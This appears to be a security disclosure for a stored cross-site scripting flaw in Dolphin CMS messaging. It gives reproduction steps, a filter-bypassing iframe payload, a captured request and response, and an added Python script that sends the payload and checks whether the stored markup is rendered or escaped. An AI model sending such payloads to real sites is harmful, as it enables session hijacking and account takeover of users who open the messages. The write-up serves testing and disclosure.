- The "Send Message" functionality was found to be vulnerable to Stored Cross-Site Scripting: a payload embedded in a message is stored server-side and executes in the browser of any user who opens it, which opens the door to session hijacking, account takeover and more advanced attack scenarios.
Stored XSS in Messaging Functionality
Steps to Reproduce:
- Log in and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
- Fill in "Recipient" and "Subject" with arbitrary values
- Paste the XSS payload below into the message body; it bypasses the application's XSS filter
- Intercept the outgoing HTTP POST request (for example with a proxy) and re-insert the payload in the "message" parameter, since the client-side editor may strip or alter it; URL-encode spaces, "=" and the other special characters so the form body is parsed correctly
- The payload executes in the recipient's browser as soon as the message is opened
// XSS payload
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
// HTTP POST request
POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]
subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>
// HTTP Response
HTTP/1.1 200 OK
Date: Fri, 21 Mar 2025 17:41:52 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 455
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<div class="MsgBox" id="1742578912167">
<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
<div class="msgbox_content bx-def-font-large bx-def-padding-sec">
Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile. </div>
</td></tr></table>
</div>
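The following Python script is an added example, not part of the original write-up. It reproduces the intercepted request programmatically (so the payload reaches the server exactly as intended, without relying on the browser editor) and adds the check a tester wants after the message is opened: whether the stored payload is rendered as raw markup (vulnerable), entity-encoded (fixed) or stripped. The endpoint, query parameters and form fields are taken from the captured request above; the session cookie value and the recipient's message page are assumptions, since the post does not show them, so the check function takes the fetched HTML as input.

```python
#!/usr/bin/env python3
"""Reproduce the Stored XSS in the Dolphin CMS "Send Message" feature.

Added example, not the original post's code. Assumptions: a valid session
cookie (COOKIE is a placeholder) and that the recipient's message view is
fetched separately and passed to classify_rendering().
"""
import html
import re
import urllib.parse
import urllib.request

BASE = "http://192.168.58.170/dolphinCMS"   # target from the write-up
COOKIE = "PHPSESSID=REPLACE_WITH_VALID_SESSION"  # assumption: fill in after login
PAYLOAD = '<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>'


def compose_request(recipient_id: int, subject: str, message: str,
                    cookie: str = COOKIE) -> urllib.request.Request:
    """Build the same POST as the intercepted request.

    urlencode() percent-encodes '<', '>', '"', '=', '(' and ')' and turns
    spaces into '+', so the server decodes the payload byte-for-byte and the
    client-side editor that might strip it is bypassed entirely.
    """
    query = urllib.parse.urlencode(
        {"ajax_mode": "true", "action": "compose_mail", "recipient_id": recipient_id})
    body = urllib.parse.urlencode({"subject": subject, "message": message}).encode()
    req = urllib.request.Request(f"{BASE}/mail.php?{query}", data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", cookie)
    return req


def decode_form_body(body: bytes) -> dict:
    """Decode a form body back into fields (what the PHP side will see)."""
    return {k: v[0] for k, v in urllib.parse.parse_qs(body.decode()).items()}


def sent_ok(response_html: str) -> bool:
    """Success marker taken from the captured HTTP response."""
    return "Message has been successfully sent" in response_html


def classify_rendering(page_html: str, payload: str = PAYLOAD) -> str:
    """Classify how the stored message renders when the recipient opens it.

    'vulnerable': the raw markup reaches the DOM, so the onerror handler fires.
    'escaped'   : entity-encoded, shown as text and never executed (fixed).
    'stripped'  : no iframe/handler left at all (filtered server-side).
    """
    if payload in page_html:
        return "vulnerable"
    if html.escape(payload, quote=True) in page_html \
            or html.escape(payload, quote=False) in page_html:
        return "escaped"
    if re.search(r"<iframe\b", page_html, re.I) is None and "onerror" not in page_html:
        return "stripped"
    return "unknown"


def send(req: urllib.request.Request) -> str:
    """Fire the request against the lab host (network access required)."""
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    req = compose_request(recipient_id=1, subject="test", message=PAYLOAD)
    print(req.full_url)
    print(req.data.decode())
    # Uncomment on the lab network:
    # print("sent:", sent_ok(send(req)))
```

To verify the finding end to end, send the message, then fetch the recipient's message view while logged in as that user and pass the HTML to classify_rendering(); "vulnerable" means the raw iframe reached the page and the alert will fire, while "escaped" is what you expect to see once output encoding has been added.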